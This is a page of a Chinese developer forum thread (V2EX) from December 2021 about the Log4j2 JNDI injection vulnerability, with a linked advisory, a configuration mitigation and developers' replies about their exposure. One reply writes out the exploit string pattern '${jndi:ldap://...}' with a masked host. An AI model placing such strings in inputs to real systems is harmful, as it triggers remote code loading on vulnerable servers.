颤抖吧 Javaer， log4j 史诗级漏洞

2021-12-10 09:16:39 +08:00

eviladan0s

漏洞预警： https://mp.weixin.qq.com/s/WBbAthHY36qY0w9e4UUl4Q

本质上是 log4j 里的 lookup 方法存在 jndi 注入（看图）： https://adan0s-1256533472.cos.ap-nanjing.myqcloud.com/uPic/20211210091200YOXTYd.jpg

百度、谷歌、苹果的框全都沦陷了： https://adan0s-1256533472.cos.ap-nanjing.myqcloud.com/uPic/202112100913225Wncr7.png

修复措施：在 log4j2.component.properties 配置文件中设置 log4j2.formatMsgNoLookups=true ，可以暂时缓解避免受漏洞的影响。

之所以是史诗级，是因为不仅 log4j 使用范围广，而且日志数据你不知道流到哪里的 log4j 就会触发

33836 次点击

所在节点

Java

189 条回复

cheng6563

2021-12-10 09:59:44 +08:00

看了下公司项目，屎山都是 log4j1 ，新一点的都是 slf4j 了，没用到 log4j2

zmxnv123

2021-12-10 10:01:31 +08:00

比较奇怪，为什么搜不到英语报道

pkoukk

2021-12-10 10:02:03 +08:00

@midasfree 一大早不错了，昨天晚上一点多被安全叫醒处理...

Jwyt

2021-12-10 10:02:31 +08:00

@cheng6563 slf4j 只是上层接口阿，得看实现层是什么吧

aababc

2021-12-10 10:02:54 +08:00

@qq1340691923 这个只是把问题掩盖了，并不是说 go 的程序就一定安全呀！

tabris17

2021-12-10 10:07:40 +08:00

用老版本反而躲过一劫

dko

2021-12-10 10:07:41 +08:00

@Archeb 不要迷之自信，低估了这个漏洞的危害。

Archeb

2021-12-10 10:09:26 +08:00

@dko 修肯定得修

jwh199588

2021-12-10 10:09:43 +08:00

有人复现了吗

KevinBlandy

2021-12-10 10:10:08 +08:00

幸好是内网应用，根本不慌。

bipy

2021-12-10 10:10:45 +08:00

哈人

supuwoerc

2021-12-10 10:13:22 +08:00

![]( https://i.bmp.ovh/imgs/2021/12/83a7153fca6d2f61.png)

早上看见群里在问，好快啊，不过这老项目是 1.x 的，躲过一劫

porr

2021-12-10 10:17:36 +08:00

@supuwoerc 1.x 问题更多吧。。

JDog

2021-12-10 10:20:31 +08:00

@cheng6563 看到这条回复给我整乐了~

wanguorui123

2021-12-10 10:25:45 +08:00

${jndi:ldap://xxxxx.xxxx.xxxx/xxxxxx}

lindas

2021-12-10 10:25:52 +08:00

项目用的 elasticsearch 里面的 log4j 版本刚好在范围内，好在是内网

kernelpanic

2021-12-10 10:27:17 +08:00

哈哈哈哈哈苹果到现在还没修复

aguesuka

2021-12-10 10:33:03 +08:00

太离谱了, 这是一个日志框架不该出现的 bug. 也许正确的应对方法不是升级或是改什么配置, 而是不要使用 log4j2 和这个作者开发的其他框架.

pigspy

2021-12-10 10:35:11 +08:00

@conhost
是我记岔了？ logback 依赖了 log4j ?

Crystal8899

2021-12-10 10:36:00 +08:00

@aguesuka “这个作者”？？

第 2 页／共 10 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/821241

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.